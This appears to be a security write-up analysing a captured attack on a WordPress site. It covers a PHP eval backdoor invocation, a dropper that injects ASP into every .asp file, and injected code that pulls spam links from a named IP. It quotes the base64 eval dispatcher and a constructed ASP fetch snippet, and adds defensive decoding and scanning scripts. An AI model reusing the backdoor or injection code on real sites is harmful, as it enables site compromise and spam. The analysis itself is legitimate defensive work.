Invocation of a PHP backdoor: the code sent to it injects Microsoft ASP code into every file whose name ends in ".asp".
The injected code itself puts 385 HTML hyperlinks into the output of the original ASP file. Those 385 hyperlinks might be an SEO campaign, they might be crappy advertising, or they might be the entrance to an online shopping experience hosted solely on compromised WordPress sites.
inetnum: 39.128.0.0 - 39.191.255.255
netname: CMNET
descr: China Mobile Communications Corporation
descr: Mobile Communications Network Operator in China
descr: Internet Service Provider in China
country: CN
It looks like the attackers were trying to use a backdoor they believed had already been planted. They expected the backdoor code to be in the file served at http://stratigery.com/wp-content/themes/twentytwelve/footer.php, which is pretty clearly a WordPress theme file (the footer template of the Twenty Twelve theme).
The captured request included 4 HTTP POST parameters: Izv0k, z0, z2 and z9.
The Izv0k parameter is apparently PHP code to be eval'ed by the backdoor:
@eval(${'_POST'}[z9](${'_POST'}[z0]))
Since parameter z9 had the value "BaSE64_dEcOdE" (PHP looks up function names case-insensitively, so that is base64_decode), this would base64-decode the string in the HTTP parameter z0 and immediately evaluate the result.
It's tempting to read the inner eval as redundant, since the backdoor already eval's Izv0k, but it isn't. If the Izv0k parameter had the value:
${'_POST'}[z9](${'_POST'}[z0])
the backdoor would only base64-decode z0 into a string and throw the string away; nothing would run it. There are two layers of code here: the short dispatcher in Izv0k, which the backdoor evaluates, and the real program hidden in z0, which needs an eval of its own.
The only deobfuscating to be done is a few base64 -d invocations.
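To make the dispatch concrete, here is an added Python example (my code, not anything from the original post or from the backdoor) that statically resolves a captured set of these POST parameters the way the backdoor would, without executing any PHP: it finds the ${'_POST'}[fn](${'_POST'}[arg]) call in the stage-1 string, looks the function name up case-insensitively as PHP does, emulates it if it is a known decoder, base64-decodes the remaining parameters (z2 is carried that way), and reports whether an eval actually wraps the call, which is what decides whether stage 2 runs or is merely decoded. The parameter values are constructed stand-ins; the real z0 and z2 payloads are not reproduced on this page. It goes a little beyond the page's single case by also recognising gzinflate and str_rot13, two other decoders commonly used in the same role.

```python
import base64
import codecs
import re
import zlib

# Constructed stand-ins for the four POST parameters described above.
# The real z0 (dropper) and z2 (ASP) payloads are not on this page.
STAGE2_SOURCE = b"<?php /* stand-in for the dropper */ echo 'dropper'; ?>"
ASP_PAYLOAD = b"<% ' stand-in for the injected ASP code %>"
SAMPLE_POST = {
    "Izv0k": "@eval(${'_POST'}[z9](${'_POST'}[z0]));",
    "z9": "BaSE64_dEcOdE",
    "z0": base64.b64encode(STAGE2_SOURCE).decode(),
    "z2": base64.b64encode(ASP_PAYLOAD).decode(),
}

# Decoders that are safe to emulate.  Keys are lower-case because PHP resolves
# function names case-insensitively ("BaSE64_dEcOdE" is base64_decode).
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda data: zlib.decompress(data, -zlib.MAX_WBITS),  # raw DEFLATE, like PHP
    "str_rot13": lambda data: codecs.decode(data.decode("latin-1"), "rot13").encode("latin-1"),
}

# ${'_POST'}[name], $_POST['name'] or $_POST["name"]; group 1 is the name.
REF = r"\$(?:\{'_POST'\}|_POST)\[['\"]?(\w+)['\"]?\]"
CALL = re.compile(rf"{REF}\({REF}\)")        # $_POST[fn]($_POST[arg])
EVAL = re.compile(r"@?\beval\s*\(", re.IGNORECASE)


def raw_deflate(data):
    """Helper for constructing a gzinflate-style sample: strip the zlib header
    (2 bytes) and Adler-32 trailer (4 bytes) to get a raw DEFLATE stream."""
    return zlib.compress(data)[2:-4]


def analyze(post):
    """Resolve, statically, what the backdoor's eval of post['Izv0k'] would do.

    Returns the decoder that would be called, the parameter it would be applied
    to, the decoded stage-2 bytes, and whether an eval wraps the call (if not,
    stage 2 is decoded but never run).  Nothing from `post` is executed.
    """
    stage1 = post["Izv0k"]
    match = CALL.search(stage1)
    if match is None:
        raise ValueError("no $_POST[fn]($_POST[arg]) call found in stage 1")
    fn_param, arg_param = match.group(1), match.group(2)
    fn_name = post[fn_param].lower()
    if fn_name not in DECODERS:
        raise ValueError(f"unknown decoder {post[fn_param]!r}; refusing to emulate")
    stage2 = DECODERS[fn_name](post[arg_param].encode("latin-1"))
    evals = len(EVAL.findall(stage1))

    # Every other parameter is treated as a side payload and base64-decoded
    # when it is valid base64 (None otherwise).
    side = {}
    for name, value in post.items():
        if name in ("Izv0k", fn_param, arg_param):
            continue
        try:
            side[name] = base64.b64decode(value, validate=True)
        except ValueError:
            side[name] = None

    return {
        "referenced": re.findall(REF, stage1),
        "decoder": fn_name,
        "decoder_param": fn_param,
        "payload_param": arg_param,
        "inner_evals": evals,
        "stage2_executed": evals > 0,
        "stage2": stage2,
        "side_payloads": side,
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_POST)
    print(f"{result['decoder']} (from {result['decoder_param']}) applied to "
          f"{result['payload_param']}; inner evals: {result['inner_evals']}")
    print("stage 2:", result["stage2"].decode(errors="replace"))
    print("z2:", result["side_payloads"]["z2"].decode(errors="replace"))
```

Feeding it a stage-1 string without the inner eval makes the point in code: the decoder is still identified and z0 still decodes, but stage2_executed comes back False.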
The base64-encoded string in HTTP parameter z0 is a dropper.
It appears to start at PHP's DOCUMENT_ROOT (normally the same as the Apache web server's DocumentRoot), work its way down the directory tree, and inject some Microsoft ASP code into every file whose name has a ".asp" extension.
It's a recursive depth-first search, so it keeps an opendir()/readdir() handle open for every directory on the path it is currently descending, one per level of nesting.
The ASP code is carried in the z2 HTTP parameter, and it's base64-encoded.
The dropper builds Linux-style paths (forward-slash separators) during its search for ".asp" files, which seems odd, since it's very unlikely that a Linux server can run ASP files. The likely explanation is that PHP on Windows accepts "/" as a directory separator too, so the same dropper works unchanged on a Windows/IIS host where PHP and classic ASP run side by side; presumably it gets sprayed at every PHP backdoor the attackers know of, and on a Linux host like this one it would only deface whatever .asp files it happened to find.
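A practitioner cleaning up after this would want to know which .asp files under the document root the dropper actually touched. Here is an added Python example (mine, not code from the post or from the dropper) that sweeps a document root for the two indicators the post gives for the injected ASP code, the Microsoft.XMLHTTP object and the download URL, walking top-down with os.walk so only the directories on the current path are open at once. The sample document root and the injected ASP snippet are constructed here for the demonstration; the page does not reproduce the real injected code, and matching the extension case-insensitively is my choice for a cleanup sweep, not something the post establishes about the dropper.

```python
import os
import tempfile

# Indicators from the post: the injected ASP fetches this URL via
# Microsoft.XMLHTTP.  File contents are lower-cased before matching.
MARKERS = (b"microsoft.xmlhttp", b"43.251.102.43/cx/cx/link/")

# Constructed stand-in for the injected ASP snippet (not the real one).
INJECTED_ASP = (
    b'<%\r\n'
    b'Set http = CreateObject("Microsoft.XMLHTTP")\r\n'
    b'http.Open "GET", "http://43.251.102.43/cx/cx/link/", False\r\n'
    b'http.Send\r\n'
    b'Response.BinaryWrite http.responseBody\r\n'
    b'%>\r\n'
)


def build_sample_tree():
    """Create a throwaway document root mixing clean and injected files.

    Returns the root path.  Constructed test data, not a real site.
    """
    root = tempfile.mkdtemp(prefix="docroot-")
    files = {
        "index.asp": b'<% Response.Write "hello" %>\r\n',
        "shop/cart.asp": b'<% Response.Write "cart" %>\r\n' + INJECTED_ASP,
        "shop/old/legacy.ASP": INJECTED_ASP.upper(),   # different case, still a hit
        "shop/readme.txt": INJECTED_ASP,                # wrong extension, ignored
        # Only one of the two markers: mentions the URL but no XMLHTTP object.
        "img/logo.asp": b'<% Response.Write "logo" %>\r\n'
                        b"' see http://43.251.102.43/cx/cx/link/\r\n",
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


def find_injected(root, markers=MARKERS, suffix=".asp"):
    """Return root-relative paths (forward slashes) of files whose name ends in
    `suffix` (case-insensitive) and whose contents contain every marker.

    os.walk is top-down and iterative, so only the directories on the current
    path are open at once; sorting keeps the output order stable.
    """
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()   # sorted in place so os.walk descends in that order
        for name in sorted(filenames):
            if not name.lower().endswith(suffix):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read().lower()
            if all(marker in data for marker in markers):
                hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return hits


if __name__ == "__main__":
    root = build_sample_tree()
    for hit in find_injected(root):
        print("injected:", hit)
```

Requiring every marker keeps a file that merely mentions the C2 address (a note, a log excerpt) from being flagged; loosen `markers` to a single indicator when you want the noisier, broader sweep.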
I'm not a denizen of the "Microsoft Ecosystem", so I don't really understand the ASP code.
It looks like it retrieves http://43.251.102.43/cx/cx/link/ using CreateObject("Microsoft.XMLHTTP"), then writes out the bytes it retrieves. Because the fetch happens on every page view, whoever controls that server can change what the compromised pages serve at any time without touching the compromised hosts again.
The bytes retrieved appear to be nothing more than 385 HTML links to other PHP web pages.
I can't get the link text to decode; it's some non-ASCII encoding, maybe Unicode of some sort.
I downloaded one of the links, http://www.michaelmurphy.com/portraits/quanmengyao.php. It looks like some kind of on-line catalog.
Some of the web sites linked to by the 385 original HTML links also appear in quanmengyao.php, like http://www.milon.ru/imagessmall/juzhimu.php.
My guess is that these 385 HTML links get you into a whole on-line store whose pages are involuntarily hosted on a world-wide assortment of compromised web sites.
This is the whois record for the IP address that the ASP code downloads from.
inetnum: 43.251.100.0 - 43.251.103.255
netname: BSYNTCL-CN
descr: Room 744, No.80 Hu Lang Road
descr: Tong Zhou Qu Lu Cheng Zhen
descr: Beijing, PRC
country: CN
role: Beijing Shijihulian Yuntong Network Technology Co
address: Room 744, No.80 Hu Lang Road, Tong Zhou Qu Lu Cheng Zhen, Beijing, PRC, Beijing Tong Zhou Qu Lu Chen
country: CN
Nothing to see here. I find Chinese ISPs to be particularly opaque.